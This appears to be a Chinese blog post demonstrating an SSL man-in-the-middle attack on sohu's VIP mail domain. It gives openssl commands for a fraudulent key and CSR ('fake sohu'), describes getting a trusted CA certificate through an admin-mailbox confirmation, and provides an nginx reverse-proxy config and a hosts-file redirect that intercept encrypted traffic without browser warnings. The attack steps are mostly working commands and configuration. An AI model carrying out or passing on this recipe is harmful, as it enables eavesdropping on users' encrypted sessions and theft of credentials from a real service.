废话不多说了,开始干活。这里sohu的vip邮箱为例(他们能在整个使用过程中支持ssl),先生成一张vip.sohu.com的key和csr

Sam@Bra:~$ mkdir ssltest
Sam@Bra:~$ cd ssltest
Sam@Bra:~/ssltest$ openssl genrsa -out vip.sohu.com.key 1024
Generating RSA private key, 1024 bit long modulus
............++++++
.....................++++++
e is 65537 (0x10001)
Sam@Bra:~/ssltest$ openssl req -new -key vip.sohu.com.key -out vip.sohu.com.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:BeiJing
Locality Name (eg, city) []:BeiJing
Organization Name (eg, company) [Internet Widgits Pty Ltd]:fake sohu
Organizational Unit Name (eg, section) []:fake
Common Name (eg, YOUR name) []:vip.sohu.com
Email Address []:ssladmin@vip.sohu.com
 
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

well,这样我们就有了一个用于vip.sohu.com的申请了,接着我们去签发这个申请

sslhijack1

然后系统会给你一大堆管理员相关的邮箱等你去选
sslhijack2

选上一个后,ca就会给你所选的邮箱发送一封确认邮件,邮件中带有一个连接,打开连接后会让你确认,确认后。。。嘿嘿,证书就到手了
sslhijack3

sslhijack4sslhijack5sslhijack6

把申请下来的证书保存一下,然后修改下nginx的配置文件,把证书加上,并且设置一个反向代理到vip.sohu.com,大概的样子如下

    # HTTPS server
    #
    server {
        listen       443;
        server_name  vip.sohu.com;
 
        ssl                  on;
        ssl_certificate      sslkeys/vip.sohu.com.crt;
        ssl_certificate_key  sslkeys/vip.sohu.com.key;
 
        ssl_session_timeout  5m;
 
        ssl_protocols  SSLv2 SSLv3 TLSv1;
        ssl_ciphers  ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP;
        ssl_prefer_server_ciphers   on;
 
        location / {
                proxy_pass      https://vip.sohu.com;
        }
    }

搞定,保存,重启nginx。修改本机的hosts文件,把vip.sohu.com这个域名指向nginx所在的服务器

127.0.0.1 vip.sohu.com

打开浏览器,输入https://vip.sohu.com,你会发现。。。。根本没任何报错或者警告信息!也就是说,ssl证书被成功替换,再就是说,你的所有传输都被劫持了。
经过测试,IE、firefox、safari等浏览器同仁纷纷表示对替换证书的行为毫不知情并对被替换后的证书予以大力支持,大肆宣扬被劫持的网站是高可信度的网站。

回头再简单阐述这个过程:用户访问一个网站,但中间已经被插了一层proxy。proxy使用了一个真实的并且高度可信的证书与用户交换数据。用户和proxy之间使用ssl加密通道交换数据。数据到了proxy后,会被解密并监听分析。之后proxy再模仿成一个client向网站的服务器发送数据,同样传输也是ssl加密的。网站的服务器对此毫不知情,只能获取到是proxy发出的请求,但其实proxy并不是最终用户,数据其实早已被监听并分析。

前面一张图是sohu自己原始的证书,第二张开始就是被替换后的证书
sslhijack7

sslhijack8

sslhijack9

sslhijack10